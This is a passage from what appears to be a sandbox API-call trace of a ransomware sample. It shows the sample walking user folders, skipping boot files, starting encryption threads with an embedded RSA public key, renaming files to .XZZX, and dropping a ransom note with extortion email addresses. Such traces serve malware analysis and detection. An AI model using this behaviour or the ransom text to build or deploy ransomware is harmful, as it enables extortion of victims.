LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.462] lstrcpyW (in: lpString1=0x17cf1c, lpString2="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" | out: lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX") returned="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX" [0183.462] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0183.462] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbb4 [0183.462] Sleep (dwMilliseconds=0x96) [0183.617] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.617] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0183.617] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0183.617] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0183.617] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0183.617] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0183.618] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0183.618] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0183.618] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0183.618] SetErrorMode (uMode=0x1) returned 0x1 [0183.618] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\_HELP_INSTRUCTION.TXT") returned 57 [0183.618] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0183.618] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0183.618] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xbb8) returned 0x0 [0183.618] RegQueryValueExW (in: hKey=0xbb8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437de18, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x437de18*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0183.618] RegCloseKey (hKey=0xbb8) returned 0x0 [0183.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0183.618] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0183.619] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbb8 [0183.619] CloseHandle (hObject=0xbb8) returned 1 [0183.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0183.619] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="Links" [0183.619] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0183.619] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0183.619] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0183.619] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.619] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0183.619] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.619] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.619] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.619] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.619] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.619] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0183.619] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0183.619] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0183.620] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0183.620] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0183.620] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0183.620] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0183.620] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0183.620] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0183.620] SetErrorMode (uMode=0x1) returned 0x1 [0183.620] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0183.620] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0183.620] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0183.620] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0183.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0183.620] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0183.620] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0183.620] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0183.620] SetErrorMode (uMode=0x1) returned 0x1 [0183.620] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\_HELP_INSTRUCTION.TXT") returned 66 [0183.620] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0183.620] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0183.621] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xbbc) returned 0x0 [0183.621] RegQueryValueExW (in: hKey=0xbbc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43ae858, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43ae858*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0183.621] RegCloseKey (hKey=0xbbc) returned 0x0 [0183.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0183.621] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0183.621] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbbc [0183.621] CloseHandle (hObject=0xbbc) returned 1 [0183.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0183.621] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0183.621] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0183.621] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0183.621] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0183.621] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0183.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0183.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0183.621] SetErrorMode (uMode=0x1) returned 0x1 [0183.621] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0183.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0183.622] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0183.622] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0183.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0183.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="Music" [0183.622] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Music" | out: lpString1="Music") returned="Music" [0183.622] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.622] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.622] lstrcmpW (lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpString2="..") returned 1 [0183.622] lstrcmpW (lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpString2=".") returned 1 [0183.622] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0183.622] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="ntldr") returned 0x0 [0183.622] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="NTLDR") returned 0x0 [0183.622] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0183.622] StrStrW (lpFirst="129DFDC608A49A7CBFF35CF70D217EC4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0183.622] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0183.622] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0183.622] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.622] lstrcpyW (in: lpString1=0x17cf1c, lpString2="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" | out: lpString1="129DFDC608A49A7CBFF35CF70D217EC4.XZZX") returned="129DFDC608A49A7CBFF35CF70D217EC4.XZZX" [0183.622] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0183.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbc0 [0183.623] Sleep (dwMilliseconds=0x96) [0183.773] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.773] lstrcmpW (lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpString2="..") returned 1 [0183.773] lstrcmpW (lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpString2=".") returned 1 [0183.773] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0183.773] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="ntldr") returned 0x0 [0183.773] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="NTLDR") returned 0x0 [0183.773] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0183.773] StrStrW (lpFirst="35A8A5603BE70712A81D33D040A3EB5A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0183.773] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0183.774] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0183.774] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.774] lstrcpyW (in: lpString1=0x17cf1c, lpString2="35A8A5603BE70712A81D33D040A3EB5A.XZZX" | out: lpString1="35A8A5603BE70712A81D33D040A3EB5A.XZZX") returned="35A8A5603BE70712A81D33D040A3EB5A.XZZX" [0183.774] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0183.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbc4 [0183.774] Sleep (dwMilliseconds=0x96) [0183.929] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.929] lstrcmpW (lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpString2="..") returned 1 [0183.929] lstrcmpW (lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpString2=".") returned 1 [0183.929] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0183.929] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="ntldr") returned 0x0 [0183.929] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="NTLDR") returned 0x0 [0183.929] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0183.929] StrStrW (lpFirst="3DAB40862FBD462437E5810B348A2A6C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0183.929] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0183.929] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0183.930] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.930] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3DAB40862FBD462437E5810B348A2A6C.XZZX" | out: lpString1="3DAB40862FBD462437E5810B348A2A6C.XZZX") returned="3DAB40862FBD462437E5810B348A2A6C.XZZX" [0183.930] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0183.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbc8 [0183.930] Sleep (dwMilliseconds=0x96) [0184.085] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0184.085] lstrcmpW (lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpString2="..") returned 1 [0184.085] lstrcmpW (lpString1="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpString2=".") returned 1 [0184.085] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0184.085] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="ntldr") returned 0x0 [0184.085] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="NTLDR") returned 0x0 [0184.085] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0184.085] StrStrW (lpFirst="5EF7279E2ED18E2582C79CC632E9726D.XZZX", lpSrch="ntdetect.com") returned 0x0 [0184.085] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 40 [0184.085] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") [0184.086] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 